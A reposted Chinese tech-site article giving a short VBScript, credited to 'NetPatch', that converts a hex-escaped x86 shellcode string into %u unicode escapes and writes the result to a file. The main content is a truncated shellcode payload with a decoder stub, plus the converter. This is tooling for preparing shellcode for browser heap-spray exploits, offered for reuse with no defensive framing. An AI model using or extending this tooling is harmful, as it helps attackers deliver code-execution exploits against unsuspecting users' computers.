vbs shellcode转换escape加密
导读:收集整理的这篇文章主要介绍了vbs shellcode转换escape加密,觉得挺不错的,现在分享给大家,也给大家做个参考。 'code by NetPatch code="\x29\x...
收集整理的这篇文章主要介绍了vbs shellcode转换escape加密,觉得挺不错的,现在分享给大家,也给大家做个参考。 'code by NetPatch code="\x29\xc9\x83\xe9\xa1\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x92\x06\x5b\x18\x83\xeb\xfc\xe2\xf4\x79\x16\x01\x52\xa1\xCF\x3d\xa1\xae\x07\xdb\x2c\x98\x9f\xb9\xe2\x79\x03\xb3\xf3\x6d\xf9\xa4\x68\xde\x9f\xc2\x81\x51\xfb\x63\xb1\x0b\x9f\xc2\x0a\x4b\x93\x49\xF1\x17\x32\x49\xc1\x03\x14\x1a\x0a\x78\xa3\…………………………"
function replACERegex(str)
set regex=new regExp
regex.pattern="\\x(..)\\x(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end Function
set fso=CreateObject("scripting.fileSystemobject")
set fileS=fso.oPEntextfile("a.txt",8,true)
fileS.wrITeline replaceregex(code)
files.close
set fso=nothing
声明:本文内容由网友自发贡献,本站不承担相应法律责任。对本内容有异议或投诉,请联系2913721942#qq.com核实处理,我们将尽快回复您,谢谢合作!
若转载请注明出处: vbs shellcode转换escape加密
本文地址: https://pptw.com/jishu/609570.html
